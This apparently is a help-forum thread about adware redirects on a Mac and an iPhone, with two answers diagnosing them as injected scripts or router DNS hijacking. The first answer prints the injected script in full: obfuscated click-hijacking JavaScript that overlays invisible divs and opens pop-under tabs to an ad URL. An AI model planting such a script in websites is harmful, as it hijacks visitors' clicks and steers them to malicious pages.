How to get rid of viruses, which redirect you to gocloudly/goac on OS X and maxonclick/ on iOS?

Question

I faced with a problem which now annoys me very hard. During the last few days from time to time I was redirected visiting my ordinary list of websites. Googling didn't help too much, because whether the solution is for Windows users, whether it is just another link to download a malware.

Redirection to gocloudly/goac: OS X El Capitan (v 10.11.6) | Google Chrome (v 52.0.2743.116) (screenshot from chrome history)

Shows a confirm popup which says that my software is not up to date and asks to download it.

1. I've already checked my chrome://extensions/ - there is nothing unusual.
2. Also I checked my hosts file and also there is nothing wrong.
3. Cleared history and browsing data.

Redirection to maxonclick/and-other-lots-of-redirections-from-here: iOS (v 9.3.5) | Safari

Random redirections.

1. Cleared history and browsing data.
2. Turned off JavaScript (it helped but actually the problem is not solved, turning it on will cause the same behaviour).

---

UPDATE:

1. Disconnected from home network within iPhone
2. Cleared Safari cache.
3. Connected with mobile internet and the redirection disappeared, so it's clearly that problem is not with those devices and their software.

Answer 1

My quick patch to this problem was to block any DNS request to that domain.

This does not (probably) solve the problem at the root, but for now it seems to work.

Some things I've noticed are:

• it happens both on my computer and my phone, and on different networks,
• the malicious scripts are injected only in http requests,
• they intercept any first click bubbling to the <html> tag,
• they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).

The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.

I've partially beautified it below:

var PPid = "p20161003pr";
var PPRet = [];
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? [] : PPbl.split(" ");
PPwl = PPwl == "" ? [] : PPwl.split(" ");
function PPdef(_0x50e8x14) {
  return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
  var _0x50e8x17 = false;
  if (_0x50e8x19 != null ) {
    l = _0x50e8x14 == "w" ? PPwl : PPbl;
    if (l.length > 0) {
      for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
        if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
          _0x50e8x17 = true;
          break
        }
      }
      ;delete l;
      !_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
    }
  }
  ;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
  if (document.attachEvent) {
    document.attachEvent("onclick", openNewTab)
  } else {
    if (document.addEventListener) {
      document.addEventListener("click", openNewTab, false)
    }
  }
}
function PPnCL() {
  return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
  var _0x50e8x22 = PPdl
    , _0x50e8x23 = new Date;
  _0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
  var cookies = document.cookie;
  cookieKey += "=";
  var cookieStartIndex = cookies.indexOf("; " + cookieKey);
  if (-1 == cookieStartIndex) {
    cookieStartIndex = cookies.indexOf(cookieKey);
    if (0 != cookieStartIndex) {
      return null
    }
  } else {
    cookieStartIndex += 2
  }
  var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
  if (-1 == cookieEndIndex) {
    (cookieEndIndex = cookies.length);
  }
  return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
  var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
  _0x50e8x14++;
  PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
  if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
    setV("PP_ID" + PPid + "." + PPac, 1);
    if (document.createEvent && (isOpera || isChrome)) {
      var _0x50e8x18 = document.createElement("a");
      _0x50e8x18.href = urlOfDamnation;
      _0x50e8x18.target = "_blank";
      var _0x50e8x19 = document.createEvent("MouseEvents");
      _0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
      _0x50e8x18.dispatchEvent(_0x50e8x19)
    } else {
      _0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
      with (_0x50e8x18) {
        opener.window.focus(),
          _0x50e8x18.location = urlOfDamnation,
        "undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
      }
    }
    ;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
      "object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
    }
    ;PPac = PPnCL()
  }
  ;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
    addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
    addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
  PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
  try {
    if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
      var elements = document.getElementsByTagName(tagName);
      var elementsCount = elements.length;
      for (var index = 0; index < elementsCount; index++) {
        var elementOffsetWidth = elements[index].offsetWidth;
        var elementOffsetHeight = elements[index].offsetHeight;
        var check = true;
        if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
          check = false;
        }
        if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
          check = false;
        }
        if (elementOffsetWidth > PPmw && check) {
          var mtadDivElement = document.createElement("div");
          mtadDivElement.className = "mtaddiv";
          var elementDimensions = elements[index].getBoundingClientRect();
          var dimensions = {
            top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
            left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
          };
          mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
          if (PPwl.length > 0) {
            attachOpenNewTabOnClick(mtadDivElement);
          }
          document.body.appendChild(mtadDivElement)
        }
      }
    }
  } catch (e) {}
}
function bcStart() {
  if (!startScript) {
    startScript = !0;
    PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
    while (PPcl.length > 0) {
      PPac = PPnCL();
      if (PPac > PPcc) {
        break
      }
    }
    ;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
    if (PPdef(PPRet)) {
      if (PPRet.length > 0) {
        var _0x50e8x2f = "";
        for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
          _0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
        }
        ;urlOfDamnation = urlOfDamnation + _0x50e8x2f
      }
    }
    ;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
      addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
      addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
    for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
      var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
      null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
          _0x50e8x18 = _0x50e8x18 || window.event;
          _0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
        }
      )
    }
    ;if (PPwl.length > 0) {
      for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
        var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
        _0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
      }
    } else {
      attachOpenNewTabOnClick(document)
    }
  }
}
var startTimeout = setTimeout(bcStart, 3000)
  , startScript = null ;
if ("function" == typeof window.addEventListener) {
  window.addEventListener("load", function() {
    clearInterval(startTimeout);
    bcStart()
  }, !1)
} else {
  try {
    window.attachEvent("onload", function() {
      clearInterval(startTimeout);
      bcStart()
    })
  } catch (D) {}
}
document.getElementsByClassName = function(className) {
  var matchingElements = [];
  className = new RegExp("\b" + className + "\b");
  for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
    if (className.test(allDOMElements[index].className)) {
      matchingElements.push(allDOMElements[index])
    }
  }
  ;return matchingElements
}

Answer 2

I've seen malware/exploits that compromise your home gateway router to redirect DNS requests to a malicious server. I've also seen malware that makes the infected PC act as a competing DHCP server on the network, which uses DHCP to tell client devices to use a malicious DNS server.

You need to determine if your router has been compromised and if it's possible to clean it up by resetting it to factory defaults and reconfiguring it from scratch. Be sure to set a custom strong admin password and a separate strong wireless security passphrase; don't leave them at the defaults, especially if you have the kind of router that shows its defaults on the label. Also, if you really don't need to be able to change settings on your router when you are away from home, be sure to disable your router's ability to be reconfigured from the WAN/Internet. Once you factory reset and reconfigure your router, check for firmware updates from the vendor.

You should also do malware scans of the devices on your network, especially Windows PCs, since they are targeted for malware and exploits more often than any other platform due to their popularity.